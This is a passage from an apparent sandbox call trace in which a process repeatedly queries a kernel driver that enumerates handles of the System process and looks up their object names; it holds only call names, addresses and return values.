AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f7f2c0, HandleInformation=0x0) returned 0x0 [0118.452] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.452] PsReleaseProcessExitSynchronization () returned 0x2 [0118.453] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.453] ObQueryNameString (in: Object=0xfffffa8001f7f2c0, ObjectNameInfo=0xfffffa8002886044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002886044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.453] ObfDereferenceObject (Object=0xfffffa8001f7f2c0) returned 0x2 [0118.453] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.453] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.453] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.453] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.453] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.453] PsAcquireProcessExitSynchronization () returned 0x0 [0118.453] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.453] ObReferenceObjectByHandle (in: Handle=0xffffffff8000052c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80118c43b0, HandleInformation=0x0) returned 0x0 [0118.453] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.453] PsReleaseProcessExitSynchronization () returned 0x2 [0118.453] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.453] ObQueryNameString (in: Object=0xfffffa80118c43b0, ObjectNameInfo=0xfffffa8002887044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002887044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.453] ObfDereferenceObject (Object=0xfffffa80118c43b0) returned 0x2 [0118.453] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.453] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.453] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.453] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.454] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.454] PsAcquireProcessExitSynchronization () returned 0x0 [0118.454] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.454] ObReferenceObjectByHandle (in: Handle=0xffffffff80000530, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e8b8b0, HandleInformation=0x0) returned 0x0 [0118.454] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.454] PsReleaseProcessExitSynchronization () returned 0x2 [0118.454] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.454] ObQueryNameString (in: Object=0xfffffa8001e8b8b0, ObjectNameInfo=0xfffffa8002888044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002888044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.454] ObfDereferenceObject (Object=0xfffffa8001e8b8b0) returned 0x2 [0118.454] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.454] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.454] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.454] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.454] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.454] PsAcquireProcessExitSynchronization () returned 0x0 [0118.454] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.454] ObReferenceObjectByHandle (in: Handle=0xffffffff80000534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800d1d46f0, HandleInformation=0x0) returned 0x0 [0118.454] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.455] PsReleaseProcessExitSynchronization () returned 0x2 [0118.455] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.455] ObQueryNameString (in: Object=0xfffffa800d1d46f0, ObjectNameInfo=0xfffffa8002889044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002889044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.455] ObfDereferenceObject (Object=0xfffffa800d1d46f0) returned 0x2 [0118.455] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.455] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.455] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.455] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.455] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.455] PsAcquireProcessExitSynchronization () returned 0x0 [0118.455] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.455] ObReferenceObjectByHandle (in: Handle=0xffffffff80000538, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e8c050, HandleInformation=0x0) returned 0x0 [0118.455] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.455] PsReleaseProcessExitSynchronization () returned 0x2 [0118.455] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.455] ObQueryNameString (in: Object=0xfffffa8001e8c050, ObjectNameInfo=0xfffffa800288a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.455] ObfDereferenceObject (Object=0xfffffa8001e8c050) returned 0x2 [0118.455] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.456] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.456] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.456] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.456] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.456] PsAcquireProcessExitSynchronization () returned 0x0 [0118.456] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.456] ObReferenceObjectByHandle (in: Handle=0xffffffff8000053c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034bd620, HandleInformation=0x0) returned 0x0 [0118.456] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.456] PsReleaseProcessExitSynchronization () returned 0x2 [0118.456] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.456] ObQueryNameString (in: Object=0xfffffa80034bd620, ObjectNameInfo=0xfffffa800288b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.456] ObfDereferenceObject (Object=0xfffffa80034bd620) returned 0x2 [0118.456] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.456] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.456] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.456] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.456] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.456] PsAcquireProcessExitSynchronization () returned 0x0 [0118.456] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.456] ObReferenceObjectByHandle (in: Handle=0xffffffff80000540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e8c680, HandleInformation=0x0) returned 0x0 [0118.457] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.457] PsReleaseProcessExitSynchronization () returned 0x2 [0118.457] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.457] ObQueryNameString (in: Object=0xfffffa8001e8c680, ObjectNameInfo=0xfffffa800288e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288e044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.457] ObfDereferenceObject (Object=0xfffffa8001e8c680) returned 0x2 [0118.457] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.457] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.457] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.457] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.457] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.457] PsAcquireProcessExitSynchronization () returned 0x0 [0118.457] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.457] ObReferenceObjectByHandle (in: Handle=0xffffffff80000544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003aa5d90, HandleInformation=0x0) returned 0x0 [0118.457] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.457] PsReleaseProcessExitSynchronization () returned 0x2 [0118.457] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.457] ObQueryNameString (in: Object=0xfffffa8003aa5d90, ObjectNameInfo=0xfffffa800288f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.457] ObfDereferenceObject (Object=0xfffffa8003aa5d90) returned 0x2 [0118.457] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.458] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.458] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.458] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.458] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.458] PsAcquireProcessExitSynchronization () returned 0x0 [0118.458] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.458] ObReferenceObjectByHandle (in: Handle=0xffffffff80000548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800379ab60, HandleInformation=0x0) returned 0x0 [0118.458] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.458] PsReleaseProcessExitSynchronization () returned 0x2 [0118.458] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.458] ObQueryNameString (in: Object=0xfffffa800379ab60, ObjectNameInfo=0xfffffa8002890044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002890044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.458] ObfDereferenceObject (Object=0xfffffa800379ab60) returned 0x2 [0118.458] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.748] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.748] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.748] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.748] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.748] PsAcquireProcessExitSynchronization () returned 0x0 [0118.748] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.748] ObReferenceObjectByHandle (in: Handle=0xffffffff8000054c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003766050, HandleInformation=0x0) returned 0x0 [0118.748] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.748] PsReleaseProcessExitSynchronization () returned 0x2 [0118.748] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.748] ObQueryNameString (in: Object=0xfffffa8003766050, ObjectNameInfo=0xfffffa80028856c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028856c4, ReturnLength=0xfffff88005163550) returned 0x0 [0118.748] ObfDereferenceObject (Object=0xfffffa8003766050) returned 0x2 [0118.748] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.748] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.748] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.748] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.748] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.748] PsAcquireProcessExitSynchronization () returned 0x0 [0118.749] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.749] ObReferenceObjectByHandle (in: Handle=0xffffffff80000550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e125b0, HandleInformation=0x0) returned 0x0 [0118.749] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.749] PsReleaseProcessExitSynchronization () returned 0x2 [0118.749] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.749] ObQueryNameString (in: Object=0xfffffa8002e125b0, ObjectNameInfo=0xfffffa8002888044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002888044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.749] ObfDereferenceObject (Object=0xfffffa8002e125b0) returned 0x2 [0118.749] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.749] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.749] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.749] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.749] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.749] PsAcquireProcessExitSynchronization () returned 0x0 [0118.749] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.749] ObReferenceObjectByHandle (in: Handle=0xffffffff80000554, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a66220, HandleInformation=0x0) returned 0x0 [0118.749] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.749] PsReleaseProcessExitSynchronization () returned 0x2 [0118.749] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.749] ObQueryNameString (in: Object=0xfffffa8003a66220, ObjectNameInfo=0xfffffa8002889044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002889044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.750] ObfDereferenceObject (Object=0xfffffa8003a66220) returned 0x2 [0118.750] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.750] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.750] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.750] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.750] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.750] PsAcquireProcessExitSynchronization () returned 0x0 [0118.750] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.750] ObReferenceObjectByHandle (in: Handle=0xffffffff80000558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f74d00, HandleInformation=0x0) returned 0x0 [0118.750] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.750] PsReleaseProcessExitSynchronization () returned 0x2 [0118.750] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.750] ObQueryNameString (in: Object=0xfffffa8001f74d00, ObjectNameInfo=0xfffffa800288a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.750] ObfDereferenceObject (Object=0xfffffa8001f74d00) returned 0x2 [0118.750] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.750] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.750] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.750] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.750] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.750] PsAcquireProcessExitSynchronization () returned 0x0 [0118.750] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.751] ObReferenceObjectByHandle (in: Handle=0xffffffff8000055c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034ec050, HandleInformation=0x0) returned 0x0 [0118.751] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.751] PsReleaseProcessExitSynchronization () returned 0x2 [0118.751] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.751] ObQueryNameString (in: Object=0xfffffa80034ec050, ObjectNameInfo=0xfffffa800288b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.751] ObfDereferenceObject (Object=0xfffffa80034ec050) returned 0x2 [0118.751] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.751] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.751] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.751] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.751] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.751] PsAcquireProcessExitSynchronization () returned 0x0 [0118.751] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.751] ObReferenceObjectByHandle (in: Handle=0xffffffff80000560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f75050, HandleInformation=0x0) returned 0x0 [0118.751] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.751] PsReleaseProcessExitSynchronization () returned 0x2 [0118.751] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.751] ObQueryNameString (in: Object=0xfffffa8001f75050, ObjectNameInfo=0xfffffa800288e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288e044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.751] ObfDereferenceObject (Object=0xfffffa8001f75050) returned 0x2 [0118.751] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.751] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.751] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.752] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.752] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.752] PsAcquireProcessExitSynchronization () returned 0x0 [0118.752] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.752] ObReferenceObjectByHandle (in: Handle=0xffffffff80000564, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003aa3510, HandleInformation=0x0) returned 0x0 [0118.752] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.752] PsReleaseProcessExitSynchronization () returned 0x2 [0118.752] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.752] ObQueryNameString (in: Object=0xfffffa8003aa3510, ObjectNameInfo=0xfffffa800288f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.752] ObfDereferenceObject (Object=0xfffffa8003aa3510) returned 0x2 [0118.752] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.752] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.752] 